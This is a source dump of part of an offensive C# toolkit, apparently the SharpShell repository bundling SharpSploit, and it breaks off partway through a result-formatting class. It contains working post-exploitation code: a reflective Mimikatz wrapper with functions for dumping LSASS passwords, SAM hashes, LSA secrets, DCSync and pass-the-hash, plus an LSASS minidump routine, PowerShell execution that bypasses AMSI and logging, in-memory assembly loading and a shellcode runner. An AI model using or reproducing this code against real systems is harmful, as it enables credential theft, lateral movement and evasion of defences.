https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net40/System.Management.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net40/System.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net40/System.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net40/mscorlib.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net40/mscorlib.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/references.yml: -------------------------------------------------------------------------------- 1 | - File: mscorlib.dll 2 | Framework: Net35 3 | Enabled: true 4 | - File: System.dll 5 | Framework: Net35 6 | Enabled: true 7 | - File: System.Core.dll 8 | Framework: Net35 9 | Enabled: true 10 | - File: System.Management.dll 11 | Framework: Net35 12 | Enabled: true 13 | - File: System.IdentityModel.dll 14 | Framework: Net35 15 | Enabled: true 16 | - File: System.DirectoryServices.dll 17 | Framework: Net35 18 | Enabled: true 19 | - File: System.Management.Automation.dll 20 | Framework: Net35 21 | Enabled: true 22 | - File: mscorlib.dll 23 | Framework: Net40 24 | Enabled: true 25 | - File: System.dll 26 | Framework: Net40 27 | Enabled: true 28 | - File: System.Core.dll 29 | Framework: Net40 30 | Enabled: true 31 | - File: System.Management.dll 32 | Framework: Net40 33 | Enabled: true 34 | - File: System.IdentityModel.dll 35 | Framework: Net40 36 | Enabled: true 37 | - File: System.DirectoryServices.dll 38 | Framework: Net40 39 | Enabled: true 40 | - File: System.Management.Automation.dll 41 | Framework: Net40 42 | Enabled: true -------------------------------------------------------------------------------- /SharpShell.API/Data/Resources/powerkatz_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/Resources/powerkatz_x64.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/Resources/powerkatz_x64.dll.comp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/Resources/powerkatz_x64.dll.comp -------------------------------------------------------------------------------- /SharpShell.API/Data/Resources/powerkatz_x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/Resources/powerkatz_x86.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/Resources/powerkatz_x86.dll.comp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/Resources/powerkatz_x86.dll.comp -------------------------------------------------------------------------------- /SharpShell.API/Data/Resources/resources.yml: -------------------------------------------------------------------------------- 1 | - Name: SharpSploit.Resources.powerkatz_x86.dll 2 | File: powerkatz_x86.dll 3 | Platform: x86 4 | Enabled: false 5 | - Name: SharpSploit.Resources.powerkatz_x64.dll 6 | File: powerkatz_x64.dll 7 | Platform: x64 8 | Enabled: false 9 | - Name: SharpSploit.Resources.powerkatz_x86.dll.comp 10 | File: powerkatz_x86.dll.comp 11 | Platform: x86 12 | Enabled: true 13 | - Name: SharpSploit.Resources.powerkatz_x64.dll.comp 14 | File: powerkatz_x64.dll.comp 15 | Platform: x64 16 | Enabled: true -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Credentials/Mimikatz.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Text; 7 | using System.Net.NetworkInformation; 8 | using System.Runtime.InteropServices; 9 | 10 | using SharpSploit.Misc; 11 | using SharpSploit.Execution; 12 | 13 | namespace SharpSploit.Credentials 14 | { 15 | /// 16 | /// (SharpSploit.Credentials.)Mimikatz is a library for executing Mimikatz functions. SharpSploit's implementation 17 | /// uses a PE Loader to execute Mimikatz functions. This is a wrapper class that loads the PE and executes user- 18 | /// specified Mimikatz functions 19 | /// 20 | /// 21 | /// Mimikatz is a tool for playing with credentials in Windows, written by Benjamin Delpy (@gentilkiwi). (Found 22 | /// at https://github.com/gentilkiwi/mimikatz). 23 | /// SharpSploit's PE Loader is adapted from work by Casey Smith (@subtee). (No longer available at original location.) 24 | /// This wrapper class is adapted from Chris Ross (@xorrior)'s implementation. (Found 25 | /// at https://github.com/xorrior/Random-CSharpTools/tree/master/DllLoader/DllLoader) 26 | /// 27 | public class Mimikatz 28 | { 29 | private static byte[] PEBytes32 { get; set; } 30 | private static byte[] PEBytes64 { get; set; } 31 | 32 | private static PE MimikatzPE { get; set; } = null; 33 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 34 | private delegate IntPtr MimikatzType(IntPtr command); 35 | 36 | /// 37 | /// Loads the Mimikatz PE with `PE.Load()` and executes a chosen Mimikatz command. 38 | /// 39 | /// Mimikatz command to be executed. 40 | /// Mimikatz output. 41 | public static string Command(string Command = "privilege::debug sekurlsa::logonPasswords") 42 | { 43 | // Console.WriteLine(String.Join(",", System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceNames())); 44 | if (MimikatzPE == null) 45 | { 46 | string[] manifestResources = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceNames(); 47 | if (IntPtr.Size == 4 && MimikatzPE == null) 48 | { 49 | if (PEBytes32 == null) 50 | { 51 | PEBytes32 = Utilities.GetEmbeddedResourceBytes("powerkatz_x86.dll"); 52 | if (PEBytes32 == null) { return ""; } 53 | } 54 | MimikatzPE = PE.Load(PEBytes32); 55 | } 56 | else if (IntPtr.Size == 8 && MimikatzPE == null) 57 | { 58 | if (PEBytes64 == null) 59 | { 60 | PEBytes64 = Utilities.GetEmbeddedResourceBytes("powerkatz_x64.dll"); 61 | if (PEBytes64 == null) { return ""; } 62 | } 63 | MimikatzPE = PE.Load(PEBytes64); 64 | } 65 | } 66 | if (MimikatzPE == null) { return ""; } 67 | IntPtr functionPointer = MimikatzPE.GetFunctionExport("powershell_reflective_mimikatz"); 68 | if (functionPointer == IntPtr.Zero) { return ""; } 69 | 70 | MimikatzType mimikatz = (MimikatzType) Marshal.GetDelegateForFunctionPointer(functionPointer, typeof(MimikatzType)); 71 | IntPtr input = Marshal.StringToHGlobalUni(Command); 72 | try 73 | { 74 | IntPtr output = mimikatz(input); 75 | return Marshal.PtrToStringUni(output); 76 | } 77 | catch (Exception e) 78 | { 79 | Console.Error.WriteLine("MimikatzException: " + e.Message + e.StackTrace); 80 | return ""; 81 | } 82 | } 83 | 84 | /// 85 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatzcommand to retrieve plaintext 86 | /// passwords from LSASS. Equates to `Command("privilege::debug sekurlsa::logonPasswords")`. (Requires Admin) 87 | /// 88 | /// Mimikatz output. 89 | public static string LogonPasswords() 90 | { 91 | return Command("privilege::debug sekurlsa::logonPasswords"); 92 | } 93 | 94 | /// 95 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve password hashes 96 | /// from the SAM database. Equates to `Command("privilege::debug lsadump::sam")`. (Requires Admin) 97 | /// 98 | /// Mimikatz output. 99 | public static string SamDump() 100 | { 101 | return Command("privilege::debug lsadump::sam"); 102 | } 103 | 104 | /// 105 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve LSA secrets 106 | /// stored in registry. Equates to `Command("privilege::debug lsadump::secrets")`. (Requires Admin) 107 | /// 108 | /// Mimikatz output. 109 | public static string LsaSecrets() 110 | { 111 | return Command("privilege::debug lsadump::secrets"); 112 | } 113 | 114 | /// 115 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve Domain 116 | /// Cached Credentials hashes from registry. Equates to `Command("privilege::debug lsadump::cache")`. 117 | /// (Requires Admin) 118 | /// 119 | /// Mimikatz output. 120 | public static string LsaCache() 121 | { 122 | return Command("privilege::debug lsadump::cache"); 123 | } 124 | 125 | /// 126 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve Wdigest 127 | /// credentials from registry. Equates to `Command("sekurlsa::wdigest")`. 128 | /// 129 | /// Mimikatz output. 130 | public static string Wdigest() 131 | { 132 | return Command("sekurlsa::wdigest"); 133 | } 134 | 135 | /// 136 | /// Loads the Mimikatz PE with `PE.Load()` and executes each of the builtin local commands (not DCSync). (Requires Admin) 137 | /// 138 | /// Mimikatz output. 139 | public static string All() 140 | { 141 | StringBuilder builder = new StringBuilder(); 142 | builder.AppendLine(LogonPasswords()); 143 | builder.AppendLine(SamDump()); 144 | builder.AppendLine(LsaSecrets()); 145 | builder.AppendLine(LsaCache()); 146 | builder.AppendLine(Wdigest()); 147 | return builder.ToString(); 148 | } 149 | 150 | /// 151 | /// Loads the Mimikatz PE with `PE.Load()` and executes the "dcsync" module to retrieve the NTLM hash of a specified (or all) Domain user. (Requires Domain Admin) 152 | /// 153 | /// Username to retrieve NTLM hash for. "All" for all domain users. 154 | /// Optionally specify an alternative fully qualified domain name. Default is current domain. 155 | /// Optionally specify a specific Domain Controller to target for the dcsync. 156 | /// The NTLM hash of the target user(s). 157 | public static string DCSync(string user, string FQDN = null, string DC = null) 158 | { 159 | string command = "lsadump::dcsync"; 160 | if (user.ToLower() == "all") 161 | { 162 | command += " /all"; 163 | } 164 | else 165 | { 166 | command += " /user:" + user; 167 | } 168 | if (FQDN != null) 169 | { 170 | command += " /domain:" + FQDN; 171 | } 172 | else 173 | { 174 | command += " /domain:" + IPGlobalProperties.GetIPGlobalProperties().DomainName; 175 | } 176 | if (DC != null) 177 | { 178 | command += " /dc:" + DC; 179 | } 180 | return Command(command); 181 | } 182 | 183 | /// 184 | /// Loads the Mimikatz PE with `PE.Load()` and executes the "pth" module to start a new process 185 | /// as a user using an NTLM password hash for authentication. 186 | /// 187 | /// Username to authenticate as. 188 | /// NTLM hash to authenticate the user. 189 | /// Optionally specify an alternative fully qualified domain name. Default is current domain. 190 | /// The command to execute as the specified user. 191 | /// 192 | public static string PassTheHash(string user, string NTLM, string FQDN = null, string run = "cmd.exe") 193 | { 194 | string command = "sekurlsa::pth"; 195 | command += " /user:" + user; 196 | if (FQDN != null) 197 | { 198 | command += " /domain:" + FQDN; 199 | } 200 | else 201 | { 202 | command += " /domain:" + IPGlobalProperties.GetIPGlobalProperties().DomainName; 203 | } 204 | command += " /ntlm:" + NTLM; 205 | command += " /run:" + run; 206 | return Command(command); 207 | } 208 | } 209 | } 210 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Enumeration/Host.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.IO; 7 | using System.Diagnostics; 8 | using System.Collections.Generic; 9 | using Microsoft.Win32; 10 | 11 | using SharpSploit.Generic; 12 | 13 | namespace SharpSploit.Enumeration 14 | { 15 | /// 16 | /// Host is a library for local host enumeration. 17 | /// 18 | public class Host 19 | { 20 | /// 21 | /// Gets a list of running processes on the system. 22 | /// 23 | /// List of ProcessResults. 24 | public static SharpSploitResultList GetProcessList() 25 | { 26 | Process[] processes = Process.GetProcesses(); 27 | SharpSploitResultList results = new SharpSploitResultList(); 28 | foreach (Process process in processes) 29 | { 30 | results.Add(new ProcessResult(process.Id, 0, process.ProcessName)); 31 | } 32 | return results; 33 | } 34 | 35 | /// 36 | /// Generates a minidump that represents the memory of a running process. Useful for offline Mimikatz 37 | /// if dumping the LSASS process. (Requires Admin) 38 | /// 39 | /// Process ID of the process to generate a minidump for. 40 | /// Path to write output file in. Defaults to the current directory. 41 | /// Filename to ouput the minidump to. 42 | /// 43 | /// Authored by Justin Bui (@youslydawg). 44 | /// 45 | public static void CreateProcessDump(int processId, string outputPath = "", string outputFileName = "") 46 | { 47 | CreateProcessDump(Process.GetProcessById(processId), outputPath, outputFileName); 48 | } 49 | 50 | /// 51 | /// Generates a minidump that represents the memory of a running process. Useful for offline Mimikatz 52 | /// if dumping the LSASS process. (Requires Admin) 53 | /// 54 | /// Name of the process to generate a minidump for. 55 | /// Path to write output file in. Defaults to the current directory. 56 | /// Filename to ouput the minidump to. 57 | /// 58 | /// Authored by Justin Bui (@youslydawg). 59 | /// 60 | public static void CreateProcessDump(string processName = "lsass", string outputPath = "", string outputFileName = "") 61 | { 62 | if (processName.EndsWith(".exe")) 63 | { 64 | processName = processName.Substring(0, processName.Length - 4); 65 | } 66 | Process[] process_list = Process.GetProcessesByName(processName); 67 | if (process_list.Length > 0) 68 | { 69 | CreateProcessDump(process_list[0], outputPath, outputFileName); 70 | } 71 | } 72 | 73 | /// 74 | /// Generates a minidump that represents the memory of a running process. Useful for offline Mimikatz 75 | /// if dumping the LSASS process. (Requires Admin) 76 | /// 77 | /// Process to generate a minidump for. 78 | /// Path to write output file in. Defaults to the current directory. 79 | /// Filename to ouput the minidump to. 80 | /// 81 | /// Authored by Justin Bui (@youslydawg). 82 | /// 83 | public static void CreateProcessDump(Process process, string outputPath = "", string outputFileName = "") 84 | { 85 | if (outputPath == "" || outputPath == null) 86 | { 87 | outputPath = GetCurrentDirectory(); 88 | } 89 | if (outputFileName == "" || outputFileName == null) 90 | { 91 | outputFileName = process.ProcessName + "_" + process.Id + ".dmp"; 92 | } 93 | 94 | string fullPath = Path.Combine(outputPath, outputFileName); 95 | FileStream fileStream = File.Create(fullPath); 96 | bool success = false; 97 | try 98 | { 99 | success = Execution.Win32.Dbghelp.MiniDumpWriteDump(process.Handle, (uint)process.Id, fileStream.SafeFileHandle, Execution.Win32.Dbghelp.MINIDUMP_TYPE.MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero); 100 | } 101 | catch (System.ComponentModel.Win32Exception e) 102 | { 103 | Console.Error.WriteLine(e.Message); 104 | } 105 | 106 | fileStream.Close(); 107 | if (!success) 108 | { 109 | File.Delete(fullPath); 110 | } 111 | } 112 | 113 | /// 114 | /// Gets the hostname of the system. 115 | /// 116 | /// Hostname of the system. 117 | public static string GetHostname() 118 | { 119 | return Environment.MachineName; 120 | } 121 | 122 | /// 123 | /// Gets the Domain name and username of the current logged on user. 124 | /// 125 | /// Current username. 126 | public static string GetUsername() 127 | { 128 | return Environment.UserDomainName + "\\" + Environment.UserName; 129 | } 130 | 131 | /// 132 | /// Gets the full path of the current working directory. 133 | /// 134 | /// Current working directory. 135 | public static string GetCurrentDirectory() 136 | { 137 | return Directory.GetCurrentDirectory(); 138 | } 139 | 140 | /// 141 | /// Gets a directory listing of the current working directory. 142 | /// 143 | /// List of FileSystemEntryResults. 144 | public static SharpSploitResultList GetDirectoryListing() 145 | { 146 | SharpSploitResultList results = new SharpSploitResultList(); 147 | foreach (string dir in Directory.GetDirectories(GetCurrentDirectory())) 148 | { 149 | results.Add(new FileSystemEntryResult(dir)); 150 | } 151 | foreach (string file in Directory.GetFiles(GetCurrentDirectory())) 152 | { 153 | results.Add(new FileSystemEntryResult(file)); 154 | } 155 | return results; 156 | } 157 | 158 | /// 159 | /// Changes the current directory by appending a specified string to the current working directory. 160 | /// 161 | /// String to append to the current directory. 162 | public static void ChangeCurrentDirectory(string AppendDirectory) 163 | { 164 | Directory.SetCurrentDirectory(GetCurrentDirectory() + "\\" + AppendDirectory); 165 | } 166 | 167 | /// 168 | /// Reads a value stored in registry. 169 | /// 170 | /// The full path to the registry value to be read. 171 | /// 172 | public static string RegistryRead(string RegPath) 173 | { 174 | var split = RegPath.Split(Path.DirectorySeparatorChar); 175 | string valueName = split[split.Length - 1]; 176 | string keyName = RegPath.Substring(0, RegPath.IndexOf(valueName)); 177 | return RegistryRead(keyName, valueName); 178 | } 179 | 180 | /// 181 | /// Reads a value stored in registry. 182 | /// 183 | /// The RegistryKey to read from. 184 | /// The name of name/value pair to read from in the RegistryKey. 185 | /// 186 | public static string RegistryRead(string RegKey, string RegValue) 187 | { 188 | try 189 | { 190 | object reg = Registry.GetValue(RegKey, RegValue, null); 191 | if (reg == null) 192 | { 193 | return null; 194 | } 195 | return reg.ToString(); 196 | } 197 | catch (Exception e) 198 | { 199 | Console.Error.WriteLine("Registry read exception: " + e.Message); 200 | return null; 201 | } 202 | } 203 | 204 | /// 205 | /// Writes a value in the registry. 206 | /// 207 | /// The full path to the registry value to be written to. 208 | /// The value to write to the registry key. 209 | /// 210 | public static bool RegistryWrite(string RegPath, object Value) 211 | { 212 | var split = RegPath.Split(Path.DirectorySeparatorChar); 213 | string valueName = split[split.Length - 1]; 214 | string keyName = RegPath.Substring(0, RegPath.IndexOf(valueName)); 215 | return RegistryWrite(keyName, valueName, Value); 216 | } 217 | 218 | /// 219 | /// Writes a value in the registry. 220 | /// 221 | /// The RegistryKey to read from. 222 | /// The name of name/value pair to read from in the RegistryKey. 223 | /// The value to write to the registry key. 224 | /// 225 | public static bool RegistryWrite(string RegKey, string RegValue, object Value) 226 | { 227 | try 228 | { 229 | Registry.SetValue(RegKey, RegValue, Value); 230 | return true; 231 | } 232 | catch (Exception e) 233 | { 234 | Console.Error.WriteLine("Registry write exception: " + e.Message); 235 | return false; 236 | } 237 | } 238 | 239 | /// 240 | /// ProcessResult represents a running process, used with the GetProcessList() function. 241 | /// 242 | public sealed class ProcessResult : SharpSploitResult 243 | { 244 | public int Pid { get; } = 0; 245 | public int Ppid { get; } = 0; 246 | public string Name { get; } = ""; 247 | protected internal override IList ResultProperties 248 | { 249 | get 250 | { 251 | return new List 252 | { 253 | new SharpSploitResultProperty 254 | { 255 | Name = "Pid", 256 | Value = this.Pid 257 | }, 258 | new SharpSploitResultProperty 259 | { 260 | Name = "Ppid", 261 | Value = this.Ppid 262 | }, 263 | new SharpSploitResultProperty 264 | { 265 | Name = "Name", 266 | Value = this.Name 267 | } 268 | }; 269 | } 270 | } 271 | 272 | public ProcessResult(int Pid = 0, int Ppid = 0, string Name = "") 273 | { 274 | this.Pid = Pid; 275 | this.Ppid = Ppid; 276 | this.Name = Name; 277 | } 278 | } 279 | 280 | /// 281 | /// FileSystemEntryResult represents a file on disk, used with the GetDirectoryListing() function. 282 | /// 283 | public sealed class FileSystemEntryResult : SharpSploitResult 284 | { 285 | public string Name { get; } = ""; 286 | protected internal override IList ResultProperties 287 | { 288 | get 289 | { 290 | return new List 291 | { 292 | new SharpSploitResultProperty 293 | { 294 | Name = "Name", 295 | Value = this.Name 296 | } 297 | }; 298 | } 299 | } 300 | 301 | public FileSystemEntryResult(string Name = "") 302 | { 303 | this.Name = Name; 304 | } 305 | } 306 | } 307 | } 308 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Execution/Assembly.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using Reflect = System.Reflection; 7 | 8 | using SharpSploit.Generic; 9 | 10 | namespace SharpSploit.Execution 11 | { 12 | /// 13 | /// Assembly is a library for loading .NET assemblies and executing methods contained within them. 14 | /// 15 | public class Assembly 16 | { 17 | /// 18 | /// Loads a specified .NET assembly byte array and executes a specified method within a 19 | /// specified type with specified parameters. 20 | /// 21 | /// The .NET assembly byte array. 22 | /// The name of the type that contains the method to execute. 23 | /// The name of the method to execute. 24 | /// The parameters to pass to the method. 25 | /// GenericObjectResult of the method. 26 | public static GenericObjectResult AssemblyExecute(byte[] AssemblyBytes, String TypeName = "", String MethodName = "Execute", Object[] Parameters = default(Object[])) 27 | { 28 | Reflect.Assembly assembly = Load(AssemblyBytes); 29 | Type type = TypeName == "" ? assembly.GetTypes()[0] : assembly.GetType(TypeName); 30 | Reflect.MethodInfo method = MethodName == "" ? type.GetMethods()[0] : type.GetMethod(MethodName); 31 | var results = method.Invoke(null, Parameters); 32 | return new GenericObjectResult(results); 33 | } 34 | 35 | /// 36 | /// Loads a specified base64-encoded .NET assembly and executes a specified method within a 37 | /// specified type with specified parameters. 38 | /// 39 | /// The base64-encoded .NET assembly byte array. 40 | /// The name of the type that contains the method to execute. 41 | /// The name of the method to execute. 42 | /// The parameters to pass to the method. 43 | /// GenericObjectResult of the method. 44 | public static GenericObjectResult AssemblyExecute(String EncodedAssembly, String TypeName = "", String MethodName = "Execute", Object[] Parameters = default(Object[])) 45 | { 46 | return AssemblyExecute(Convert.FromBase64String(EncodedAssembly)); 47 | } 48 | 49 | /// 50 | /// Loads a specified .NET assembly byte array. 51 | /// 52 | /// The .NET assembly byte array. 53 | /// Loaded assembly. 54 | public static Reflect.Assembly Load(byte[] AssemblyBytes) 55 | { 56 | return Reflect.Assembly.Load(AssemblyBytes); 57 | } 58 | 59 | /// 60 | /// Loads a specified .NET assembly byte array. 61 | /// 62 | /// The base64-encoded .NET assembly byte array. 63 | /// Loaded assembly. 64 | public static Reflect.Assembly Load(string EncodedAssembly) 65 | { 66 | return Reflect.Assembly.Load(Convert.FromBase64String(EncodedAssembly)); 67 | } 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Execution/Shell.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Linq; 7 | using System.Reflection; 8 | using System.Diagnostics; 9 | using System.Management.Automation; 10 | 11 | namespace SharpSploit.Execution 12 | { 13 | /// 14 | /// Shell is a library for executing shell commands. 15 | /// 16 | public class Shell 17 | { 18 | /// 19 | /// Executes specified PowerShell code using System.Management.Automation.dll and bypasses 20 | /// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging). 21 | /// 22 | /// PowerShell code to execute. 23 | /// Switch. If true, appends Out-String to the PowerShellCode to execute. 24 | /// Switch. If true, bypasses ScriptBlock and Module logging. 25 | /// Switch. If true, bypasses AMSI. 26 | /// Output of executed PowerShell. 27 | /// 28 | /// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module 29 | /// logging bypass goes to Lee Christensen (@_tifkin). 30 | /// 31 | public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true) 32 | { 33 | if (PowerShellCode == null || PowerShellCode == "") return ""; 34 | 35 | using (PowerShell ps = PowerShell.Create()) 36 | { 37 | BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static; 38 | if (BypassLogging) 39 | { 40 | var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); 41 | if (PSEtwLogProvider != null) 42 | { 43 | var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags); 44 | var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); 45 | EtwProvider.SetValue(null, EventProvider); 46 | } 47 | } 48 | if (BypassAmsi) 49 | { 50 | var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils"); 51 | if (amsiUtils != null) 52 | { 53 | amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true); 54 | } 55 | } 56 | ps.AddScript(PowerShellCode); 57 | if (OutString) { ps.AddCommand("Out-String"); } 58 | var results = ps.Invoke(); 59 | string output = String.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray()); 60 | ps.Commands.Clear(); 61 | return output; 62 | } 63 | } 64 | 65 | /// 66 | /// Executes a specified Shell command, optionally with an alternative username and password. 67 | /// Equates to `ShellExecuteWithPath(ShellCommand, "C:\\WINDOWS\\System32")`. 68 | /// 69 | /// The ShellCommand to execute, including any arguments. 70 | /// Optional alternative username to execute ShellCommand as. 71 | /// Optional alternative Domain of the username to execute ShellCommand as. 72 | /// Optional password to authenticate the username to execute the ShellCommand as. 73 | /// Ouput of the ShellCommand. 74 | public static string ShellExecute(string ShellCommand, string Username = "", string Domain = "", string Password = "") 75 | { 76 | return ShellExecuteWithPath(ShellCommand, "C:\\WINDOWS\\System32\\", Username, Domain, Password); 77 | } 78 | 79 | /// 80 | /// Executes a specified Shell command from a specified directory, optionally with an alternative username and password. 81 | /// 82 | /// The ShellCommand to execute, including any arguments. 83 | /// The Path of the directory from which to execute the ShellCommand. 84 | /// Optional alternative username to execute ShellCommand as. 85 | /// Optional alternative Domain of the username to execute ShellCommand as. 86 | /// Optional password to authenticate the username to execute the ShellCommand as. 87 | /// Output of the ShellCommand. 88 | public static string ShellExecuteWithPath(string ShellCommand, string Path, string Username = "", string Domain = "", string Password = "") 89 | { 90 | if (ShellCommand == null || ShellCommand == "") return ""; 91 | 92 | string ShellCommandName = ShellCommand.Split(' ')[0]; 93 | string ShellCommandArguments = ""; 94 | if (ShellCommand.Contains(" ")) 95 | { 96 | ShellCommandArguments = ShellCommand.Replace(ShellCommandName + " ", ""); 97 | } 98 | 99 | Process shellProcess = new Process(); 100 | if (Username != "") 101 | { 102 | shellProcess.StartInfo.UserName = Username; 103 | shellProcess.StartInfo.Domain = Domain; 104 | System.Security.SecureString SecurePassword = new System.Security.SecureString(); 105 | foreach (char c in Password) 106 | { 107 | SecurePassword.AppendChar(c); 108 | } 109 | shellProcess.StartInfo.Password = SecurePassword; 110 | } 111 | shellProcess.StartInfo.FileName = ShellCommandName; 112 | shellProcess.StartInfo.Arguments = ShellCommandArguments; 113 | shellProcess.StartInfo.WorkingDirectory = Path; 114 | shellProcess.StartInfo.UseShellExecute = false; 115 | shellProcess.StartInfo.CreateNoWindow = true; 116 | shellProcess.StartInfo.RedirectStandardOutput = true; 117 | shellProcess.Start(); 118 | 119 | string output = shellProcess.StandardOutput.ReadToEnd(); 120 | shellProcess.WaitForExit(); 121 | 122 | return output; 123 | } 124 | } 125 | } -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Execution/ShellCode.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Runtime.InteropServices; 7 | 8 | namespace SharpSploit.Execution 9 | { 10 | /// 11 | /// ShellCode includes a method for executing shellcode. 12 | /// 13 | public class ShellCode 14 | { 15 | [UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)] 16 | private delegate Int32 Run(); 17 | 18 | /// 19 | /// Executes a specified ShellCode byte array by copying it to pinned memory, modifying the memory 20 | /// permissions with VirtualProtect(), and executing using a delegate. 21 | /// 22 | /// ShellCode byte array to execute. 23 | /// Boolean. True if execution succeeds, false otherwise. 24 | /// Based upon code written by Matt Nelson (@enigma0x3) and Matt Graeber (@mattifestation). 25 | public static bool ShellCodeExecute(byte[] ShellCode) 26 | { 27 | try 28 | { 29 | GCHandle pinnedArray = GCHandle.Alloc(ShellCode, GCHandleType.Pinned); 30 | IntPtr ptr = pinnedArray.AddrOfPinnedObject(); 31 | Marshal.Copy(ShellCode, 0, ptr, ShellCode.Length); 32 | 33 | uint flOldProtect = 0; 34 | if (!Win32.Kernel32.VirtualProtect(ptr, (UIntPtr)ShellCode.Length, 0x40, out flOldProtect)) 35 | { 36 | return false; 37 | } 38 | Run del = (Run)Marshal.GetDelegateForFunctionPointer(ptr, typeof(Run)); 39 | del(); 40 | return true; 41 | } 42 | catch (Exception e) 43 | { 44 | Console.Error.WriteLine("ShellCodeExecute exception: " + e.Message); 45 | } 46 | return false; 47 | } 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Generic/Generic.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Text; 7 | using System.Linq; 8 | using System.Collections.Generic; 9 | using System.Collections; 10 | 11 | namespace SharpSploit.Generic 12 | { 13 | /// 14 | /// GenericObjectResult for listing objects whose type is unknown at compile time. 15 | /// 16 | public sealed class GenericObjectResult : SharpSploitResult 17 | { 18 | public object Result { get; } 19 | protected internal override IList ResultProperties 20 | { 21 | get 22 | { 23 | return new List 24 | { 25 | new SharpSploitResultProperty 26 | { 27 | Name = this.Result.GetType().Name, 28 | Value = this.Result 29 | } 30 | }; 31 | } 32 | } 33 | 34 | public GenericObjectResult(object Result) 35 | { 36 | this.Result = Result; 37 | } 38 | } 39 | 40 | /// 41 | /// SharpSploitResultList extends the IList interface for SharpSploitResults to easily 42 | /// format a list of results from various SharpSploit functions. 43 | /// 44 | /// 45 | public class SharpSploitResultList : IList where T : SharpSploitResult 46 | { 47 | private List Results { get; } = new List(); 48 | 49 | public int Count => Results.Count; 50 | public bool IsReadOnly => ((IList)Results).IsReadOnly; 51 | 52 | 53 | private const int PROPERTY_SPACE = 3; 54 | 55 | /// 56 | /// Formats a SharpSploitResultList to a string similar to PowerShell's Format-List function. 57 | /// 58 | /// string 59 | public string FormatList() 60 | { 61 | return this.ToString(); 62 | } 63 | 64 | private string FormatTable() 65 | { 66 | // TODO 67 | return ""; 68 | } 69 | 70 | /// 71 | /// Formats a SharpSploitResultList as a string. Overrides ToString() for convenience. 72 | /// 73 | /// string 74 | public override string ToString() 75 | { 76 | if (this.Results.Count > 0) 77 | { 78 | StringBuilder builder1 = new StringBuilder(); 79 | StringBuilder builder2 = new StringBuilder(); 80 | for (int i = 0; i < this.Results[0].ResultProperties.Count; i++) 81 | { 82 | 